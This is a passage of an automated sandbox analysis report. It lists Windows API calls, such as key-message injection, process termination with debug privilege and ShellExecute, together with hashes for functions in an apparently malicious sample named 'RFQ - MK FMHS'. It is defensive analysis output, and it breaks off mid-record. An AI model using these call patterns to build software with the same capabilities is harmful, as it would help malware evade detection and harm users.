                      • Part of subcall function 00ECAE57: AttachThreadInput.USER32(00000000,?,00EC9B65,?,00000001), ref: 00ECAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EC9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EC9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EC9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EC9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                    • Instruction ID: 424d0f42d744776db48f8e2b8a8d0eb74869b71f3ac4c99125d0f1928c0366f9
                    • Opcode Fuzzy Hash: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                    • Instruction Fuzzy Hash: F3112172900208BEF7106B22DC8DFAA3B2CEF8C755F110429F204BB0A1C9F35C51DAA4
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E0C
                    • HeapAlloc.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E43
                    • GetCurrentProcess.KERNEL32(00EC8A84,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00EC8E74,00000000,00000000,00000000), ref: 00EC8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                    • Instruction ID: 08f2421a0396cff254ee8a32df7807bcdd7efa2e4ad3d51e0b2b1a4eff7567f0
                    • Opcode Fuzzy Hash: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                    • Instruction Fuzzy Hash: 1001AC75641304FFE610AB65DD89F673B6CEF89711F404421FA05EB2A2CA71D814CA20
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    • Opcode ID: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                    • Instruction ID: 4b852b4fbefcd46ecedf91398f8bc85c687b44140fbbdb395eed8c0c3ead1992
                    • Opcode Fuzzy Hash: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                    • Instruction Fuzzy Hash: 1091BD71A00259ABDF24DFA6C848FAEB7F8EF85314F10915AF515BB282D7709905CFA0
                    APIs
                      • Part of subcall function 00EC7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                      • Part of subcall function 00EC7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                      • Part of subcall function 00EC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                      • Part of subcall function 00EC7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EE9B1B
                    • _memset.LIBCMT ref: 00EE9B28
                    • _memset.LIBCMT ref: 00EE9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00EE9C97
                    • CoTaskMemFree.OLE32(?), ref: 00EE9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 00EE9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                    • Instruction ID: 0a70f6d2744ff386f9ed364ebc4fe0e3838d73fabbbb82c35b7c4bb0e50e81a4
                    • Opcode Fuzzy Hash: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                    • Instruction Fuzzy Hash: 3D912771D0022DABDB10DFA5DC85ADEBBF8EF08710F20916AE519B7241DB719A45CFA0
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF70C1
                    • _wcscat.LIBCMT ref: 00EF711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                    • Instruction ID: 5072cb75653128cc2ba8f077a9be24cc1f5234b9452aa5f6c9d047562ada2442
                    • Opcode Fuzzy Hash: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                    • Instruction Fuzzy Hash: 64417071A04308AFDB219F64CC85BFA77E8EF08354F10556AFA84E6191D6719D848B60
                    APIs
                      • Part of subcall function 00ED3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED3EB6
                      • Part of subcall function 00ED3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00ED3EC4
                      • Part of subcall function 00ED3E91: CloseHandle.KERNEL32(00000000), ref: 00ED3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECB8
                    • GetLastError.KERNEL32 ref: 00EEECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEED77
                    • GetLastError.KERNEL32(00000000), ref: 00EEED82
                    • CloseHandle.KERNEL32(00000000), ref: 00EEEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00ED32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED454E
                    • LoadStringW.USER32(00000000), ref: 00ED4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED456B
                    • LoadStringW.USER32(00000000), ref: 00ED4572
                    • _wprintf.LIBCMT ref: 00ED4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00ED4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetSystemMetrics.USER32(0000000F), ref: 00EFD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00EFD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00EFDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00E72ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E72B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED737F
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 00ED73D2
                    • _memmove.LIBCMT ref: 00ED7420
                    • _memmove.LIBCMT ref: 00ED743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00EF645A
                    • GetDC.USER32(00000000), ref: 00EF6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00EF6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF6520
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • _wcstok.LIBCMT ref: 00EDEEFF
                    • _wcscpy.LIBCMT ref: 00EDEF8E
                    • _memset.LIBCMT ref: 00EDEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • IsWindow.USER32(014B7648), ref: 00EFB6A5
                    • IsWindowEnabled.USER32(014B7648), ref: 00EFB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFB795
                    • SendMessageW.USER32(014B7648,000000B0,?,?), ref: 00EFB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00EFB809
                    • GetWindowLongW.USER32(014B7648,000000EC), ref: 00EFB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    APIs
                    • _memset.LIBCMT ref: 00EEF75C
                    • _memset.LIBCMT ref: 00EEF825
                    • ShellExecuteExW.SHELL32(?), ref: 00EEF86A
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00EEF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00EEF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    APIs
                    • GetParent.USER32(?), ref: 00ED149C
                    • GetKeyboardState.USER32(?), ref: 00ED14B1
                    • SetKeyboardState.USER32(?), ref: 00ED1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    • GetParent.USER32(00000000), ref: 00ED12B5
                    • GetKeyboardState.USER32(?), ref: 00ED12CA
                    • SetKeyboardState.USER32(?), ref: 00ED132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED13D9
                    Memory Dump Source
